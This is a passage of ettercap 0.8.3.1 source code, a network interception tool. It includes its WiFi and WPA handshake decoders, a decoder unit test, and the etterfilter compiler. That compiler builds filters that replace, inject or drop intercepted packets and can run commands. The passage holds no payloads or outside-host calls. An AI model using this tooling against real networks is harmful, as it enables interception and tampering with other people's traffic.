Mic=1, Ack=0, Inst=0, Key=1(pairwise), KeyRSC=0, Nonce=0, MIC=MIC(KCK,EAPOL)) * to distinguish between message 2 and 4, check the len of the key_data_len (should be == 0) */ if (/* ((key_info & WPA_KEY_TKIP) || (key_info & WPA_KEY_SECURE) != 0) && */ (key_info & WPA_KEY_MIC) != 0 && (key_info & WPA_KEY_ACK) == 0 && (key_info & WPA_KEY_INSTALL) == 0 && eapol_key->key_data_len == 0) return EAPOL_4WAY_MESSAGE_FOUR; /* invalid packet */ return -E_NOTHANDLED; } static int eapol_enc_algo(struct eapol_key_header *eapol_key) { u_int16 key_info = ntohs(eapol_key->key_info); if ((key_info & WPA_KEY_TKIP) != 0) return WPA_KEY_TKIP; if ((key_info & WPA_KEY_CCMP) != 0) return WPA_KEY_CCMP; return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_wifi_prism.c000664 000000 000000 00000003245 13711276346 021264 0ustar00rootroot000000 000000 /* ettercap -- Prism2 header for WiFi packets Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* protos */ FUNC_DECODER(decode_prism); FUNC_ALIGNER(align_prism); void prism_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init prism_init(void) { add_decoder(LINK_LAYER, IL_TYPE_PRISM, decode_prism); add_aligner(IL_TYPE_PRISM, align_prism); } FUNC_DECODER(decode_prism) { FUNC_DECODER_PTR(next_decoder); /* Simply skip the first 0x90 Bytes (the Prism2 header) and pass * the whole packet on to the wifi layer */ DECODED_LEN = 0x90; next_decoder = get_decoder(LINK_LAYER, IL_TYPE_WIFI); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_prism) { /* already aligned */ return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_wifi_radiotap.c000664 000000 000000 00000005124 13711276346 021733 0ustar00rootroot000000 000000 /* ettercap -- RadioTap header for WiFi packets Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include struct radiotap_header { u_int8 version; u_int8 pad; u_int16 len; u_int32 present_flags; #define RADIO_PRESENT_TSFT 0x01 #define RADIO_PRESENT_FLAGS 0x02 #define RADIO_PRESENT_RATE 0x04 #define RADIO_PRESENT_CHANNEL 0x08 }; #define RADIO_FLAGS_FCS 0x10 /* protos */ FUNC_DECODER(decode_radiotap); FUNC_ALIGNER(align_radiotap); void radiotap_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init radiotap_init(void) { add_decoder(LINK_LAYER, IL_TYPE_RADIO, decode_radiotap); add_aligner(IL_TYPE_RADIO, align_radiotap); } FUNC_DECODER(decode_radiotap) { FUNC_DECODER_PTR(next_decoder); struct radiotap_header *radio; u_char *rh; u_int8 flags = 0; /* get the header */ radio = (struct radiotap_header *)DECODE_DATA; rh = (u_char *)(radio + 1); /* get the length of the header */ DECODED_LEN = radio->len; /* * scan for the presence of the information * we are lucky since the FLAGS we are searching is the second field * and we don't have to scan for all of them */ if ((radio->present_flags & RADIO_PRESENT_TSFT)) { /* the TSFT is 1 byte */ rh += 1; } if ((radio->present_flags & RADIO_PRESENT_FLAGS)) { /* read the flags (1 byte) */ flags = *rh; } /* mark the packet, since we have an FCS at the end */ if ((flags & RADIO_FLAGS_FCS)) PACKET->L2.flags |= PO_L2_FCS; next_decoder = get_decoder(LINK_LAYER, IL_TYPE_WIFI); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_radiotap) { /* already aligned */ return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/tests/000775 000000 000000 00000000000 13711276346 014624 5ustar00rootroot000000 000000 ettercap-0.8.3.1/tests/CMakeLists.txt000664 000000 000000 00000000667 13711276346 017375 0ustar00rootroot000000 000000 include_directories(. ../include ${LIBCHECK_INCLUDE_DIRS}) add_custom_target(test_verbose COMMAND ${CMAKE_CTEST_COMMAND} -V) # Adds a test by name macro(_t NAME) add_executable(test_${NAME} test_${NAME}.c) target_link_libraries(test_${NAME} lib_ettercap ec_interfaces ${LIBCHECK_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT} ${LIBCHECK_LDFLAGS}) add_test(test_${NAME} ${CMAKE_CURRENT_BINARY_DIR}/test_${NAME}) endmacro() _t(ec_decode) ettercap-0.8.3.1/tests/test_ec_decode.c000664 000000 000000 00000002610 13711276346 017720 0ustar00rootroot000000 000000 #include #include #include #include #include #include struct ec_globals *ec_gbls; // Yes, this is hack-ish. We can change it later. START_TEST (test_get_decoder_default) { fail_if(get_decoder(APP_LAYER, PL_DEFAULT) == NULL, "Could not find default decoder."); } END_TEST START_TEST (test_get_decoder_ip) { fail_if(get_decoder(NET_LAYER, LL_TYPE_IP) == NULL, "Could not find IP decoder."); } END_TEST START_TEST (test_get_decoder_tcp) { fail_if(get_decoder(PROTO_LAYER, NL_TYPE_TCP) == NULL, "Could not find TCP decoder."); } END_TEST START_TEST (test_get_decoder_udp) { fail_if(get_decoder(PROTO_LAYER, NL_TYPE_UDP) == NULL, "Could not find UDP decoder."); } END_TEST Suite* ts_test_decode (void) { Suite *suite = suite_create("ts_test_decode"); TCase *tcase = tcase_create("get_decoder"); tcase_add_test(tcase, test_get_decoder_default); tcase_add_test(tcase, test_get_decoder_ip); tcase_add_test(tcase, test_get_decoder_tcp); tcase_add_test(tcase, test_get_decoder_udp); suite_add_tcase(suite, tcase); return suite; } int main () { int number_failed; libettercap_init("test", "0.0.1"); Suite *suite = ts_test_decode(); SRunner *runner = srunner_create(suite); srunner_run_all(runner, CK_VERBOSE); number_failed = srunner_ntests_failed(runner); srunner_free(runner); return number_failed; } ettercap-0.8.3.1/utils/000775 000000 000000 00000000000 13711276346 014622 5ustar00rootroot000000 000000 ettercap-0.8.3.1/utils/CMakeLists.txt000664 000000 000000 00000002752 13711276346 017370 0ustar00rootroot000000 000000 ## Etterfilter set(EF_SRC etterfilter/ef_compiler.c etterfilter/ef_encode.c etterfilter/ef_main.c etterfilter/ef_output.c etterfilter/ef_parser.c etterfilter/ef_tables.c etterfilter/ef_test.c ) find_package(BISON) find_package(FLEX) bison_target(EF_PARSER etterfilter/ef_grammar.y ${CMAKE_CURRENT_BINARY_DIR}/ef_grammar.c) flex_target(EF_SCANNER etterfilter/ef_syntax.l ${CMAKE_CURRENT_BINARY_DIR}/ef_syntax.c) add_flex_bison_dependency(EF_SCANNER EF_PARSER) # For ef_grammar.h include_directories(${CMAKE_CURRENT_BINARY_DIR}) add_executable(etterfilter ${EF_SRC} ${FLEX_EF_SCANNER_OUTPUTS} ${BISON_EF_PARSER_OUTPUTS}) target_link_libraries(etterfilter lib_ettercap) if(NOT DISABLE_RPATH) set_target_properties(etterfilter PROPERTIES INSTALL_RPATH ${INSTALL_LIBDIR}) endif() ## Etterlog set(EL_SRC etterlog/el_analyze.c etterlog/el_conn.c etterlog/el_decode.c etterlog/el_decode_http.c etterlog/el_display.c etterlog/el_log.c etterlog/el_main.c etterlog/el_parser.c etterlog/el_profiles.c etterlog/el_stream.c etterlog/el_target.c ) add_executable(etterlog ${EL_SRC}) target_link_libraries(etterlog lib_ettercap) if(NOT DISABLE_RPATH) set_target_properties(etterlog PROPERTIES INSTALL_RPATH ${INSTALL_LIBDIR}) endif() install(TARGETS etterfilter etterlog DESTINATION ${INSTALL_BINDIR}) ettercap-0.8.3.1/utils/etterfilter/000775 000000 000000 00000000000 13711276346 017153 5ustar00rootroot000000 000000 ettercap-0.8.3.1/utils/etterfilter/ef_compiler.c000664 000000 000000 00000026524 13711276346 021614 0ustar00rootroot000000 000000 /* etterfilter -- the actual compiler Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /* globals */ /* * the compiler works this way: * * while bison parses the input it calls the function to * create temporary lists of "blocks". a block is a compound * of virtual instruction. every block element can contain a * single instruction or a if block. * the if block contains a link to the conditions list and two * link for the two block to be executed if the condition is * true or the else block (if any). * * so, after bison has finished its parsing we have a tree of * virtual instructions like that: * * ----------- * | tree root | * ----------- * | * ----------- ------------- * | block elm | --> | instruction | * ----------- ------------- * | * ----------- ------------- * | block elm | --> | instruction | * ----------- ------------- * | * ----------- ------------- ------------ * | block elm | --> | if block | --> | conditions | * ----------- ------------- ------------ * . / \ * . ----------- ----------- * . | block elm | | block elm | . . . * ----------- ----------- * . . * . . * * to create a binary filter we have to unfold the tree by converting * the conditions into test, eliminating the virtual if block and * create the right conditional jumps. * during the first unfolding the jumps are referencing virtual labels. * all the instructions are unfolded in a double-linked list. * * the last phase involves the tanslation of the labels into real offsets */ static struct block *tree_root; struct unfold_elm { u_int32 label; struct filter_op fop; TAILQ_ENTRY (unfold_elm) next; }; static TAILQ_HEAD(, unfold_elm) unfolded_tree = TAILQ_HEAD_INITIALIZER(unfolded_tree); /* label = 0 means "no label" */ static u_int32 vlabel = 1; /* protos */ static void unfold_blk(struct block **blk); static void unfold_ifblk(struct block **blk); static void unfold_conds(struct condition *cnd, u_int32 a, u_int32 b); static void labels_to_offsets(void); /*******************************************/ /* * set the entry point of the filter tree */ int compiler_set_root(struct block *blk) { BUG_IF(blk == NULL); tree_root = blk; return E_SUCCESS; } /* * allocate an instruction container for filter_op */ struct instruction * compiler_create_instruction(struct filter_op *fop) { struct instruction *ins; SAFE_CALLOC(ins, 1, sizeof(struct instruction)); /* copy the instruction */ memcpy(&ins->fop, fop, sizeof(struct filter_op)); return ins; } /* * allocate a condition container for filter_op */ struct condition * compiler_create_condition(struct filter_op *fop) { struct condition *cnd; SAFE_CALLOC(cnd, 1, sizeof(struct condition)); /* copy the instruction */ memcpy(&cnd->fop, fop, sizeof(struct filter_op)); return cnd; } /* * concatenates two conditions with a logical operator */ struct condition * compiler_concat_conditions(struct condition *a, u_int16 op, struct condition *b) { struct condition *head = a; /* go to the last conditions in 'a' */ while(a->next != NULL) a = a->next; /* set the operation */ a->op = op; /* contatenate the two block */ a->next = b; /* return the head of the conditions */ return head; } /* * allocate a ifblock container */ struct ifblock * compiler_create_ifblock(struct condition *conds, struct block *blk) { struct ifblock *ifblk; SAFE_CALLOC(ifblk, 1, sizeof(struct ifblock)); /* associate the pointers */ ifblk->conds = conds; ifblk->blk = blk; return ifblk; } /* * allocate a if_else_block container */ struct ifblock * compiler_create_ifelseblock(struct condition *conds, struct block *blk, struct block *elseblk) { struct ifblock *ifblk; SAFE_CALLOC(ifblk, 1, sizeof(struct ifblock)); /* associate the pointers */ ifblk->conds = conds; ifblk->blk = blk; ifblk->elseblk = elseblk; return ifblk; } /* * add an instruction to a block */ struct block * compiler_add_instr(struct instruction *ins, struct block *blk) { struct block *bl; SAFE_CALLOC(bl, 1, sizeof(struct block)); /* copy the current instruction in the block */ bl->type = BLK_INSTR; bl->un.ins = ins; /* link it to the old block chain */ bl->next = blk; return bl; } /* * add an if block to a block */ struct block * compiler_add_ifblk(struct ifblock *ifb, struct block *blk) { struct block *bl; SAFE_CALLOC(bl, 1, sizeof(struct block)); /* copy the current instruction in the block */ bl->type = BLK_IFBLK; bl->un.ifb = ifb; /* link it to the old block chain */ bl->next = blk; return bl; } /* * parses the tree and produce a compiled * array of filter_op */ size_t compile_tree(struct filter_op **fop) { int i = 1; struct filter_op *array = NULL; struct unfold_elm *ue; // invalid file if (tree_root == NULL) return 0; USER_MSG(" Unfolding the meta-tree "); /* start the recursion on the tree */ unfold_blk(&tree_root); USER_MSG(" done.\n\n"); /* substitute the virtual labels with real offsets */ labels_to_offsets(); /* convert the tailq into an array */ TAILQ_FOREACH(ue, &unfolded_tree, next) { /* label == 0 means a real instruction */ if (ue->label == 0) { SAFE_REALLOC(array, i * sizeof(struct filter_op)); memcpy(&array[i - 1], &ue->fop, sizeof(struct filter_op)); i++; } } /* always append the exit function to a script */ SAFE_REALLOC(array, i * sizeof(struct filter_op)); array[i - 1].opcode = FOP_EXIT; /* return the pointer to the array */ *fop = array; return (i); } /* * unfold a block putting it in the unfolded_tree list */ static void unfold_blk(struct block **blk) { struct unfold_elm *ue = NULL; BUG_IF(*blk == NULL); /* the progress bar */ ef_debug(1, "+"); do { switch((*blk)->type) { case BLK_INSTR: /* insert the instruction as is */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); memcpy(&ue->fop, (*blk)->un.ins, sizeof(struct filter_op)); TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); break; case BLK_IFBLK: unfold_ifblk(blk); break; default: BUG("undefined tree element"); break; } } while ((*blk = (*blk)->next)); } /* * unfold an if block putting it in the unfolded_tree list */ static void unfold_ifblk(struct block **blk) { struct ifblock *ifblk; struct unfold_elm *ue; u_int32 a = vlabel++; u_int32 b = vlabel++; u_int32 c = vlabel++; /* * the virtual labels represent the three points of an if block: * * if (conds) { * a -> * ... * jmp c; * b -> * } else { * ... * } * c -> * * if the conds are true, jump to 'a' * if the conds are false, jump to 'b' * 'c' is used to skip the else if the conds were true */ /* the progress bar */ ef_debug(1, "#"); /* cast the if block */ ifblk = (*blk)->un.ifb; /* compile the conditions */ unfold_conds(ifblk->conds, a, b); /* if the conditions are match, jump here */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); ue->label = a; TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); /* check if the block is empty. i.e. { } */ if (ifblk->blk != NULL) { /* recursively compile the main block */ unfold_blk(&ifblk->blk); } /* * if there is the else block, we have to skip it * if the condition was true */ if (ifblk->elseblk != NULL) { SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); ue->fop.opcode = FOP_JMP; ue->fop.op.jmp = c; TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); } /* if the conditions are NOT match, jump here (after the block) */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); ue->label = b; TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); /* recursively compile the else block */ if (ifblk->elseblk != NULL) { unfold_blk(&ifblk->elseblk); /* this is the label to skip the else if the condition was true */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); ue->label = c; TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); } } /* * unfold a conditions block putting it in the unfolded_tree list */ static void unfold_conds(struct condition *cnd, u_int32 a, u_int32 b) { struct unfold_elm *ue = NULL; do { /* the progress bar */ ef_debug(1, "?"); /* insert the condition as is */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); memcpy(&ue->fop, &cnd->fop, sizeof(struct filter_op)); TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); /* insert the conditional jump */ SAFE_CALLOC(ue, 1, sizeof(struct unfold_elm)); if (cnd->op == COND_OR) { ue->fop.opcode = FOP_JTRUE; ue->fop.op.jmp = a; } else { /* AND and single instructions behave equally */ ue->fop.opcode = FOP_JFALSE; ue->fop.op.jmp = b; } TAILQ_INSERT_TAIL(&unfolded_tree, ue, next); } while ((cnd = cnd->next)); } /* * converts the virtual labels to real offsets */ static void labels_to_offsets(void) { struct unfold_elm *ue; struct unfold_elm *s; u_int32 offset = 0; USER_MSG(" Converting labels to real offsets "); TAILQ_FOREACH(ue, &unfolded_tree, next) { /* search only for jumps */ if (ue->fop.opcode == FOP_JMP || ue->fop.opcode == FOP_JTRUE || ue->fop.opcode == FOP_JFALSE) { switch (ue->fop.opcode) { case FOP_JMP: ef_debug(1, "*"); break; case FOP_JTRUE: ef_debug(1, "+"); break; case FOP_JFALSE: ef_debug(1, "-"); break; } /* search the offset associated with the label */ TAILQ_FOREACH(s, &unfolded_tree, next) { if (s->label == ue->fop.op.jmp) { ue->fop.op.jmp = offset; /* reset the offset */ offset = 0; break; } /* if it is an instruction, increment the offset */ if (s->label == 0) offset++; } } } USER_MSG(" done.\n\n"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_encode.c000664 000000 000000 00000034736 13711276346 021243 0ustar00rootroot000000 000000 /* etterfilter -- the actual compiler Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #ifdef HAVE_PCRE #include #endif /* protos */ static char ** decode_args(char *args, int *nargs); static char * strsep_quotes(char **stringp, const char delim); /*******************************************/ /* * search an offset and fill the filter_op structure * return E_SUCCESS on error. */ int encode_offset(char *string, struct filter_op *fop) { char *str, *p, *q, *tok; int ret; memset(fop, 0, sizeof(struct filter_op)); /* make the modifications on a copy */ str = strdup(string); /* * the offset contains at least one '.' * we are sure because the syntax parser * will not have passed it here if it is not * in the right form. */ p = ec_strtok(str, ".", &tok); q = ec_strtok(NULL, ".", &tok); /* * the assumption above is not always true, e.g.: * log(DATA,d "x.log"); * results in q == NULL. */ if (q == NULL) return -E_NOTFOUND; /* the the virtual pointer from the table */ ret = get_virtualpointer(p, q, &fop->op.test.level, &fop->op.test.offset, &fop->op.test.size); SAFE_FREE(str); return ret; } /* * assing the value of the const to the fop.value * * all the value are integer32 and are saved in host order */ int encode_const(char *string, struct filter_op *fop) { char *p; memset(fop, 0, sizeof(struct filter_op)); /* it is an hexadecimal value */ if (!strncmp(string, "0x", 2) && isxdigit((int)string[2])) { fop->op.test.value = strtoul(string, NULL, 16); return E_SUCCESS; /* it is an integer value */ } else if (isdigit((int)string[0])) { fop->op.test.value = strtoul(string, NULL, 10); return E_SUCCESS; /* it is an ip address */ } else if (string[0] == '\'' && string[strlen(string) - 1] == '\'') { struct ip_addr ipaddr; /* remove the single quote */ p = strchr(string + 1, '\''); *p = '\0'; if (ip_addr_pton(string + 1, &ipaddr) == E_SUCCESS) { switch (ntohs(ipaddr.addr_type)) { case AF_INET: /* 4-bytes - handle as a integer */ fop->op.test.value = ntohl(ipaddr.addr32[0]); break; case AF_INET6: /* 16-bytes - handle as a byte pointer */ ip_addr_cpy((u_char*)&fop->op.test.ipaddr, &ipaddr); break; default: return -E_FATAL; } } else { return -E_FATAL; } return E_SUCCESS; /* it is a string */ } else if (string[0] == '\"' && string[strlen(string) - 1] == '\"') { /* remove the quotes */ p = strchr(string + 1, '\"'); *p = '\0'; /* copy the string */ fop->op.test.string = (u_char*)strdup(string + 1); /* escape it in the structure */ fop->op.test.slen = strescape((char*)fop->op.test.string, (char*)fop->op.test.string, strlen(fop->op.test.string)+1); return E_SUCCESS; /* it is a constant */ } else if (isalpha((int)string[0])) { return get_constant(string, &fop->op.test.value); } /* anything else is an error */ return -E_NOTFOUND; } /* * parse a function and its arguments and fill the structure */ int encode_function(char *string, struct filter_op *fop) { char *str = strdup(string); int ret = -E_NOTFOUND; char *name, *args; int nargs = 0, i; char **dec_args = NULL; char *tok; memset(fop, 0, sizeof(struct filter_op)); /* get the name of the function */ name = ec_strtok(string, "(", &tok); /* get all the args */ args = name + strlen(name) + 1; /* analyze the arguments */ dec_args = decode_args(args, &nargs); /* this fop is a function */ fop->opcode = FOP_FUNC; /* check if it is a known function */ if (!strcmp(name, "search")) { if (nargs == 2) { /* get the level (DATA or DECODED) */ if (encode_offset(dec_args[0], fop) == E_SUCCESS) { /* encode offset wipe the fop !! */ fop->opcode = FOP_FUNC; fop->op.func.op = FFUNC_SEARCH; fop->op.func.string = (u_char*)strdup(dec_args[1]); fop->op.func.slen = strescape((char*)fop->op.func.string, (char*)fop->op.func.string, strlen(fop->op.func.string)+1); ret = E_SUCCESS; } else SCRIPT_ERROR("Unknown offset %s ", dec_args[0]); } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "regex")) { if (nargs == 2) { int err; regex_t regex; char errbuf[100]; /* get the level (DATA or DECODED) */ if (encode_offset(dec_args[0], fop) == E_SUCCESS) { /* encode offset wipe the fop !! */ fop->opcode = FOP_FUNC; fop->op.func.op = FFUNC_REGEX; fop->op.func.string = (u_char*)strdup(dec_args[1]); fop->op.func.slen = strescape((char*)fop->op.func.string, (char*)fop->op.func.string, strlen(fop->op.func.string)+1); ret = E_SUCCESS; } else SCRIPT_ERROR("Unknown offset %s ", dec_args[0]); /* check if the regex is valid */ err = regcomp(®ex, (const char*)fop->op.func.string, REG_EXTENDED | REG_NOSUB | REG_ICASE ); if (err) { regerror(err, ®ex, errbuf, sizeof(errbuf)); SCRIPT_ERROR("%s", errbuf); } regfree(®ex); } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "pcre_regex")) { #ifndef HAVE_PCRE WARNING("The script contains pcre_regex, but you don't have support for it."); #else pcre *pregex; const char *errbuf = NULL; int erroff; if (nargs == 2) { /* get the level (DATA or DECODED) */ if (encode_offset(dec_args[0], fop) == E_SUCCESS) { /* encode offset wipe the fop !! */ fop->opcode = FOP_FUNC; fop->op.func.op = FFUNC_PCRE; fop->op.func.string = strdup(dec_args[1]); fop->op.func.slen = strlen(fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Unknown offset %s ", dec_args[0]); /* check if the pcre is valid */ pregex = pcre_compile(fop->op.func.string, 0, &errbuf, &erroff, NULL ); if (pregex == NULL) SCRIPT_ERROR("%s\n", errbuf); pcre_free(pregex); } else if (nargs == 3) { fop->opcode = FOP_FUNC; fop->op.func.op = FFUNC_PCRE; /* substitution always at layer DATA */ fop->op.func.level = 5; fop->op.func.string = strdup(dec_args[1]); fop->op.func.slen = strlen(fop->op.func.string); fop->op.func.replace = strdup(dec_args[2]); fop->op.func.rlen = strlen(fop->op.func.replace); ret = E_SUCCESS; /* check if the pcre is valid */ pregex = pcre_compile(fop->op.func.string, 0, &errbuf, &erroff, NULL ); if (pregex == NULL) SCRIPT_ERROR("%s\n", errbuf); pcre_free(pregex); } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); #endif } else if (!strcmp(name, "replace")) { if (nargs == 2) { fop->op.func.op = FFUNC_REPLACE; /* replace always operate at DATA level */ fop->op.func.level = 5; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strescape((char*)fop->op.func.string, (char*)fop->op.func.string, strlen(fop->op.func.string)+1); fop->op.func.replace = (u_char*)strdup(dec_args[1]); fop->op.func.rlen = strescape((char*)fop->op.func.replace, (char*)fop->op.func.replace, strlen(fop->op.func.replace)+1); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "inject")) { if (nargs == 1) { fop->op.func.op = FFUNC_INJECT; /* inject always operate at DATA level */ fop->op.func.level = 5; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strlen((const char*)fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "execinject")) { if (nargs == 1) { fop->op.func.op = FFUNC_EXECINJECT; /* execinject always operate at DATA level */ fop->op.func.level = 5; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strlen((const char*)fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "execreplace")) { if (nargs == 1) { fop->op.func.op = FFUNC_EXECREPLACE; /* execreplace always operate at DATA level */ fop->op.func.level = 5; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strlen((const char*)fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "log")) { if (nargs == 2) { /* get the level (DATA or DECODED) */ if (encode_offset(dec_args[0], fop) == E_SUCCESS) { /* encode offset wipe the fop !! */ fop->opcode = FOP_FUNC; fop->op.func.op = FFUNC_LOG; fop->op.func.string = (u_char*)strdup(dec_args[1]); fop->op.func.slen = strlen((const char*)fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Unknown offset %s ", dec_args[0]); } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "drop")) { if (nargs == 0) { fop->op.func.op = FFUNC_DROP; ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "kill")) { if (nargs == 0) { fop->op.func.op = FFUNC_KILL; ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "msg")) { if (nargs == 1) { fop->op.func.op = FFUNC_MSG; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strescape((char*)fop->op.func.string, (char*)fop->op.func.string, strlen(fop->op.func.string)+1); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "exec")) { if (nargs == 1) { fop->op.func.op = FFUNC_EXEC; fop->op.func.string = (u_char*)strdup(dec_args[0]); fop->op.func.slen = strlen((const char*)fop->op.func.string); ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } else if (!strcmp(name, "exit")) { if (nargs == 0) { fop->opcode = FOP_EXIT; ret = E_SUCCESS; } else SCRIPT_ERROR("Wrong number of arguments for function \"%s\" ", name); } /* free the array */ for (i = 0; i < nargs; i++) SAFE_FREE(dec_args[i]); SAFE_FREE(dec_args); SAFE_FREE(str); return ret; } /* * split the args of a function and return * the number of found args */ static char ** decode_args(char *args, int *nargs) { char *p, *q, *arg; int i = 0; char **parsed; *nargs = 0; /* get the end */ if ((p = strrchr(args, ')')) != NULL) *p = '\0'; /* trim the empty spaces */ for (; *args == ' '; args++); for (q = args + strlen(args) - 1; *q == ' '; q--) *q = '\0'; /* there are no arguments */ if (!strchr(args, ',') && strlen(args) == 0) return NULL; SAFE_CALLOC(parsed, 1, sizeof(char *)); /* split the arguments */ for (p = strsep_quotes(&args, ','), i = 1; p != NULL; p = strsep_quotes(&args, ','), i++) { /* alloc the array for the arguments */ SAFE_REALLOC(parsed, (i + 1) * sizeof(char *)); /* trim the empty spaces */ for (arg = p; *arg == ' '; arg++); for (q = arg + strlen(arg) - 1; *q == ' '; q--) *q = '\0'; /* remove the quotes (if there are) */ if (*arg == '\"' && arg[strlen(arg) - 1] == '\"') { arg[strlen(arg) - 1] = '\0'; arg++; } /* put in in the array */ parsed[i - 1] = strdup(arg); ef_debug(5, "ARGUMENT: %s\n", arg); } /* return the number of args */ *nargs = i - 1; return parsed; } /* * split the string in tokens separated by 'delim'. * ignore 'delim' if it is between two quotes "..." */ static char * strsep_quotes(char **stringp, const char delim) { char *s; int c; char *tok; /* sanity check */ if ((s = *stringp) == NULL) return (NULL); /* parse the string */ for (tok = s;;) { /* XXX - * this does not parses correctly string in the form: * * "foo, bar, "tic,tac"" */ /* skip string between quotes */ if (*s == '\"') while(*(++s) != '\"' && *s != '\0'); c = *s++; /* search for the delimiter */ if ( c == delim || c == 0) { if (c == 0) s = NULL; else s[-1] = 0; *stringp = s; return (tok); } } /* NOTREACHED */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_grammar.y000664 000000 000000 00000033031 13711276346 021445 0ustar00rootroot000000 000000 /* etterfilter -- grammar for filter source files Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ %{ #include #include #include #define YYERROR_VERBOSE /* declare yylex here as it's only missing in bison */ int yylex(void); %} /* * ========================================== * BISON Declarations * ========================================== */ /* definition for the yylval (global variable) */ %union { char *string; struct filter_op fop; /* used to create the compiler tree */ struct block *blk; struct instruction *ins; struct ifblock *ifb; struct condition *cnd; } /* token definitions */ %token TOKEN_EOL %token TOKEN_CONST /* an integer number */ %token TOKEN_OFFSET /* an offset in the form xxxx.yyy.zzzzz */ %token TOKEN_STRING /* a string "xxxxxx" */ %token TOKEN_FUNCTION /* a function */ %token TOKEN_IF /* if ( ) { */ %token 